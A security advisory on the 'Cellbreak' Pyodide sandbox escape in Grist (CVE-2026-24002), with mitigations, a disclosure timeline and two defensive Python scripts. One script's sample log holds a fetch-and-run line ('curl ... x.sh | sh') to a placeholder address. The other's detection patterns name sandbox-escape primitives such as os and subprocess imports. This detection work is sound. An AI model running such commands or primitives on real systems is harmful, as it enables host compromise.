Security researchers at Cyera Research Labs have disclosed a critical vulnerability in Grist-Core, the open-source spreadsheet and database platform, that allows remote code execution through malicious spreadsheet formulas. The flaw, dubbed “Cellbreak,” enables attackers to escape the Python sandbox and execute arbitrary code on host systems.
Vulnerability overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-24002 |
| CVSS Score | 9.1 (Critical) |
| Codename | Cellbreak |
| Type | Pyodide Sandbox Escape → RCE |
| Discovered by | Vladimir Tokarev (Cyera Research Labs) |
| Advisory | GHSA-7xvx-8pf2-pv5g |
| Public disclosure | January 21, 2026 |
| Patch available | Grist 1.7.9+ |
What is Grist?
Grist is a programmable spreadsheet and database platform that combines the familiarity of spreadsheets with the power of databases and Python scripting. It serves as an alternative to Excel and Google Sheets for users who need advanced data manipulation capabilities.
Key features:
- Python formulas in spreadsheet cells
- Relational database functionality
- API integrations
- Workflow automation
- Self-hosted and SaaS deployment options
Adoption:
- Government agencies (including France’s public sector)
- 1,000+ organizations in higher education
- Marketing and product teams
- Data analysis workflows
Technical details
The Pyodide sandbox
Grist allows users to write Python formulas in spreadsheet cells for advanced data manipulation. To keep that from becoming arbitrary code execution, the formulas run inside a Pyodide sandbox. Pyodide is CPython compiled to WebAssembly; a WebAssembly module has no operating-system access of its own, so the effective security boundary is whatever the host JavaScript runtime exposes to it through Pyodide's JavaScript bridge. That boundary, not a process or kernel boundary, is what the escape described below crosses, which is why "run host-runtime JavaScript" appears among the outcomes.
The escape
Cyera Research Labs discovered that the sandbox can be escaped when Grist is configured with:
GRIST_SANDBOX_FLAVOR=pyodide
A malicious formula can break out of the Pyodide sandbox and:
- Execute OS commands on the host
- Run host-runtime JavaScript
- Access the underlying file system
- Pivot to other systems
Attack requirements
| Requirement | Details |
|---|---|
| Authentication | The attacker needs no account on the target instance; a legitimate user must open or import the attacker-supplied document |
| User interaction | Document must be processed (opened, imported) |
| Configuration | GRIST_SANDBOX_FLAVOR=pyodide |
| Attack complexity | Low |
Attack scenarios
Scenario 1: Shared workspace compromise
- Attacker creates spreadsheet with malicious formula
- Shares document with team members
- Any user opening the document triggers the exploit
- Attacker gains code execution on victim’s Grist server
- Lateral movement to connected systems
Scenario 2: Malicious template
- Attacker uploads malicious template to public sharing platforms
- Organizations import template for internal use
- Formula executes on victim infrastructure
- Attacker establishes persistence
Scenario 3: Automated processing
Organizations allowing spreadsheet uploads for automated processing are at risk:
- File upload triggers formula evaluation
- No user interaction required beyond upload acceptance
- Automated systems may have elevated privileges
Impact assessment
Blast radius
| Environment | Impact |
|---|---|
| Self-hosted | RCE on internal server, access to connected systems |
| SaaS | RCE in vendor control plane, potential multi-tenant impact |
| Integrated | Access to connected databases, APIs, business systems |
Data at risk
Grist deployments typically contain sensitive business data:
- Financial models and projections
- Customer information
- Operational data
- Integration credentials
- Business logic and workflows
Confidentiality, Integrity, Availability
Once RCE is achieved:
- Confidentiality: Full access to host data and connected systems
- Integrity: Ability to modify data, inject backdoors
- Availability: Potential for data destruction or ransomware
Remediation
Patch information
The Grist security team implemented a fix in version 1.7.9 that runs Pyodide under Deno, a JavaScript runtime whose access to the file system, network and subprocesses is denied unless explicitly granted. This adds a second isolation layer outside the WebAssembly boundary, so that reaching the host JavaScript runtime no longer means reaching the host.
| Version | Status |
|---|---|
| < 1.7.9 | Vulnerable |
| 1.7.9+ | Patched |
Update immediately to version 1.7.9 or later.
Patch technical details
| Fix component | Implementation |
|---|---|
| Deno wrapper | Pyodide runs inside Deno sandbox |
| Permission restrictions | File system, network access denied by default |
| Process isolation | Separate process for formula evaluation |
| Resource limits | Memory and CPU constraints enforced |
Verification
After updating:
- Confirm the running version is 1.7.9 or later (grist --version, or the version reported by your package or container image)
- Review sandbox configuration settings (GRIST_SANDBOX_FLAVOR and related variables)
- Audit existing spreadsheets for suspicious formulas
- Test formula functionality in non-production environment
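The audit step above is easiest to do from the document metadata rather than by clicking through sheets. The following is an added example, not Grist project code: a heuristic scan over the two metadata tables a Grist document exposes through its REST API, _grist_Tables and _grist_Tables_column (fetched with GET /api/docs/{docId}/tables/<name>/records, which returns records of the form {"id": ..., "fields": {...}}). The field names used (tableId, parentId, colId, formula, isFormula) are the author's understanding of that schema, the sample records are constructed, and the patterns are generic "leave the Python world" primitives for triage, not a signature of the Cellbreak exploit, whose details are not on this page.

```python
"""Heuristic audit of Grist formulas for sandbox-escape primitives.

Added example, not Grist project code. Input is the record list returned by
Grist's REST API for the _grist_Tables and _grist_Tables_column metadata
tables; the records below are constructed for the example.
"""
import re

# Assumption: generic primitives that a formula has no business using
# (Pyodide's `js` bridge to the host JavaScript runtime, dynamic import,
# eval/exec, OS and process modules, dunder introspection, raw file access).
# They are a review heuristic, not a signature of the Cellbreak exploit itself.
SUSPICIOUS = {
    "pyodide_js_bridge": re.compile(r"\b(?:import\s+js\b|from\s+js\b|pyodide)"),
    "dynamic_import": re.compile(r"__import__|\bimportlib\b"),
    "eval_exec": re.compile(r"\b(?:eval|exec|compile)\s*\("),
    "os_process": re.compile(r"\b(?:os|subprocess|sys|socket|ctypes)\b"),
    "dunder_introspection": re.compile(
        r"__(?:builtins|globals|subclasses|class|bases|mro|dict)__"),
    "file_access": re.compile(r"\bopen\s*\("),
}

# Constructed sample: two user tables, four columns. Column 11 is a trigger
# formula (isFormula False); it still runs as Python, so it is scanned too.
SAMPLE_TABLES = [
    {"id": 1, "fields": {"tableId": "Invoices"}},
    {"id": 2, "fields": {"tableId": "Staging"}},
]
SAMPLE_COLUMNS = [
    {"id": 10, "fields": {"parentId": 1, "colId": "Total", "isFormula": True,
                          "formula": "$Quantity * $UnitPrice"}},
    {"id": 11, "fields": {"parentId": 1, "colId": "Due", "isFormula": False,
                          "formula": "$Issued + datetime.timedelta(days=30)"}},
    {"id": 12, "fields": {"parentId": 2, "colId": "Notes", "isFormula": True,
                          "formula": "import js\njs.eval('1')"}},
    {"id": 13, "fields": {"parentId": 2, "colId": "Hidden", "isFormula": True,
                          "formula": "__import__('os').listdir('/')"}},
]


def scan_formulas(tables, columns):
    """Return (tableId, colId, rule) for every formula that matches a rule.

    Regular and trigger formulas are both scanned; empty formulas are skipped.
    """
    table_names = {t["id"]: t["fields"]["tableId"] for t in tables}
    findings = []
    for col in columns:
        fields = col["fields"]
        formula = fields.get("formula") or ""
        if not formula.strip():
            continue
        table = table_names.get(fields["parentId"], "table#%s" % fields["parentId"])
        for rule, pattern in SUSPICIOUS.items():
            if pattern.search(formula):
                findings.append((table, fields["colId"], rule))
    return findings


if __name__ == "__main__":
    for table, col, rule in scan_formulas(SAMPLE_TABLES, SAMPLE_COLUMNS):
        print(f"{table}.{col}: {rule}")
```

Run it against every document on the instance, not only the ones users complain about: a malicious template imported months ago looks like any other document. Expect some false positives from legitimate formulas that happen to mention a flagged word; the point is to produce a short list for a human to read, not a verdict.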
Temporary mitigations
If immediate patching isn’t possible:
| Control | Implementation |
|---|---|
| Restrict formula authoring | Formulas are core Grist functionality and cannot be switched off outright; limit document Editor and Owner roles to trusted users (Viewers cannot change formulas) and stop importing documents from untrusted sources |
| Sandbox flavor | The condition named in this advisory is GRIST_SANDBOX_FLAVOR=pyodide; Grist also documents a gvisor flavor for Linux hosts. Do not set unsandboxed as a workaround, since that removes isolation entirely |
| Network isolation | Limit the Grist server's egress (most post-exploitation needs an outbound connection) and its reach into internal systems |
| Upload controls | Restrict who can upload or create spreadsheets, including automated import paths |
| Monitoring | Watch for child processes of the Grist server and unexpected outbound connections |
Formula security: A broader problem
Cellbreak highlights a persistent challenge: any formula language is a potential attack surface.
| Platform | Risk |
|---|---|
| Excel | Macros remain persistent threat vector |
| Google Sheets | Apps Script can be abused for phishing, data theft |
| Jupyter Notebooks | Execute arbitrary code by design |
| Airtable | Scripts and automations |
| Notion | Embedded code blocks |
The tension between functionality (users want programmable spreadsheets) and security (code execution is dangerous) creates inherent risk in these platforms.
Detection
Indicators of compromise
- Unusual processes spawned by Grist server
- Outbound network connections to unexpected destinations
- File system modifications outside normal Grist paths
- New user accounts or SSH keys on host system
- Unexpected cron jobs or scheduled tasks
Monitoring recommendations
| Source | What to watch |
|---|---|
| Process logs | Child processes of Grist application |
| Network logs | Outbound connections from Grist server |
| File integrity | Changes outside Grist data directories |
| Authentication | New accounts, privilege changes |
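The "child processes of the Grist application" row is the highest-signal source here: a formula engine has no reason to spawn a shell. The following is an added example, not Grist project code, of that check run over a process-exec log. Input is the text output of the bcc execsnoop tool (columns PCOMM, PID, PPID, RET, ARGS); only PID, PPID and ARGS are used, so any exec log carrying those fields works the same way. The Grist entrypoint path, the allowlisted sandbox worker command and the log lines are constructed for the example and must be replaced with a baseline taken from your own deployment.

```python
"""Flag unexpected processes executed beneath a Grist server.

Added example, not Grist project code. Parses execsnoop-style lines,
rebuilds the process tree from PID/PPID, and reports every exec under the
Grist server that is not on an allowlist of expected children.
"""
import re

# Constructed: how this deployment's Grist server process is recognised.
GRIST_ROOT = re.compile(r"/opt/grist/app\.js$")
# Constructed: the only command the Grist server is expected to spawn.
# Build this from a known-good host; anything else under Grist is an alert.
ALLOWED_CHILDREN = [re.compile(r"^/usr/bin/node /opt/grist/")]

# Constructed sample log. 198.51.100.0/24 is a documentation address range.
SAMPLE_EXECSNOOP = """\
PCOMM            PID    PPID   RET ARGS
systemd          4001   1        0 /usr/bin/node /opt/grist/app.js
node             4102   4001     0 /usr/bin/node /opt/grist/sandbox-worker.js
node             4350   4102     0 /bin/sh -c curl -s http://198.51.100.7/x.sh | sh
sh               4351   4350     0 /usr/bin/curl -s http://198.51.100.7/x.sh
sh               4352   4350     0 /bin/sh
sshd             4400   900      0 /usr/bin/bash
"""


def parse_execsnoop(text):
    """Yield (pid, ppid, args) per data line; the header and blanks are skipped."""
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or not parts[1].isdigit():
            continue  # header line or truncated record
        yield int(parts[1]), int(parts[2]), parts[4]


def find_escapes(text, root_re=GRIST_ROOT, allowed=ALLOWED_CHILDREN):
    """Return [(pid, ppid, args)] for execs inside the Grist process tree that
    are not allowlisted.

    Ancestry comes from the log's own PID/PPID pairs, so the Grist server must
    itself appear as an exec in the window being analysed (for a long-running
    server, seed `roots` from `pidof` instead of relying on the log).
    """
    events = list(parse_execsnoop(text))
    parent = {pid: ppid for pid, ppid, _ in events}
    roots = {pid for pid, _, args in events if root_re.search(args)}

    def under_grist(pid):
        seen = set()
        while pid in parent and pid not in seen:
            seen.add(pid)
            pid = parent[pid]
            if pid in roots:
                return True
        return False

    alerts = []
    for pid, ppid, args in events:
        if pid in roots or not under_grist(pid):
            continue
        if any(rx.search(args) for rx in allowed):
            continue  # the expected sandbox worker, not an escape
        alerts.append((pid, ppid, args))
    return alerts


if __name__ == "__main__":
    for pid, ppid, args in find_escapes(SAMPLE_EXECSNOOP):
        print(f"ALERT pid={pid} ppid={ppid} {args}")
```

Note that the allowlist is matched against the full command line, not just the binary: a second node process is expected under Grist, but only the one running the sandbox worker. Descendants of an allowlisted process are still checked, which is exactly what catches the shell spawned by the worker in the sample.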
Recommendations
For Grist administrators
- Patch immediately to the latest version
- Audit existing spreadsheets for suspicious formulas
- Review who can create documents and restrict if possible
- Network segment Grist servers from sensitive systems
- Enable logging and monitor for anomalies
For organizations evaluating Grist
- Understand the security model of programmable spreadsheets
- Assess whether Python formula capability is required
- Plan for regular patching and security updates
- Implement network segmentation for data platforms
For security teams
- Include spreadsheet platforms in threat models
- Monitor for sandbox escape vulnerabilities across similar tools
- Educate users about risks of opening untrusted spreadsheets
- Implement file upload scanning where possible
Similar vulnerabilities in programmable platforms
Cellbreak joins a pattern of sandbox escape vulnerabilities in low-code/no-code platforms:
Related vulnerability: N8scape (n8n)
| Attribute | Cellbreak (Grist) | N8scape (n8n) |
|---|---|---|
| CVE | CVE-2026-24002 | CVE-2025-3385 |
| Platform | Grist spreadsheet | n8n workflow automation |
| Sandbox | Pyodide (Python) | VM2 (JavaScript) |
| CVSS | 9.1 | 9.8 |
| Impact | Host RCE | Host RCE |
| Disclosure | January 2026 | August 2025 |
Both vulnerabilities demonstrate the difficulty of safely executing user-provided code in multi-tenant or shared environments.
Pattern analysis
| Platform type | Sandbox technology | Common weakness |
|---|---|---|
| Spreadsheets | Python/Pyodide | Import restrictions bypassed |
| Workflow tools | JavaScript/VM2 | Prototype pollution |
| Notebooks | IPython kernels | No true isolation |
| Low-code apps | Various | Insufficient permission boundaries |
Security researcher Vladimir Tokarev (who discovered Cellbreak) has noted the systemic nature of these issues:
“Sandboxing user code is fundamentally difficult. Every sandbox eventually gets broken. The question is whether additional isolation layers exist to contain the escape.”
Responsible disclosure timeline
| Date | Event |
|---|---|
| December 15, 2025 | Vladimir Tokarev discovers vulnerability |
| December 16, 2025 | Initial report to Grist security team |
| December 17, 2025 | Grist acknowledges report |
| January 8, 2026 | Patch developed and tested |
| January 15, 2026 | Grist 1.7.9 released |
| January 21, 2026 | Public disclosure (coordinated) |
| January 27, 2026 | Full technical writeup published |
The 30 days from initial report (December 16) to patched release (January 15), with coordinated public disclosure six days after the release, is consistent with responsible disclosure practice.
Context
Cellbreak demonstrates that sandbox escapes remain a significant vulnerability class. As organizations adopt more sophisticated data tools with embedded scripting capabilities, the attack surface expands.
The vulnerability’s impact spans self-hosted and SaaS deployments. In SaaS environments, a sandbox escape isn’t just local server RCE—it becomes RCE in the vendor’s control plane, potentially affecting multiple tenants.
Vladimir Tokarev’s discovery of both Cellbreak and similar vulnerabilities in other platforms suggests a systemic issue with code execution sandboxing. Organizations should:
- Assume sandboxes will eventually be bypassed
- Implement defense-in-depth with multiple isolation layers
- Treat programmable platforms as high-risk code execution environments
Grist’s rapid response and patch demonstrate responsible handling, but the underlying architectural challenge—enabling powerful functionality while preventing abuse—remains difficult across the industry. The addition of Deno as an outer sandbox provides the type of layered defense that should become standard for platforms executing user code.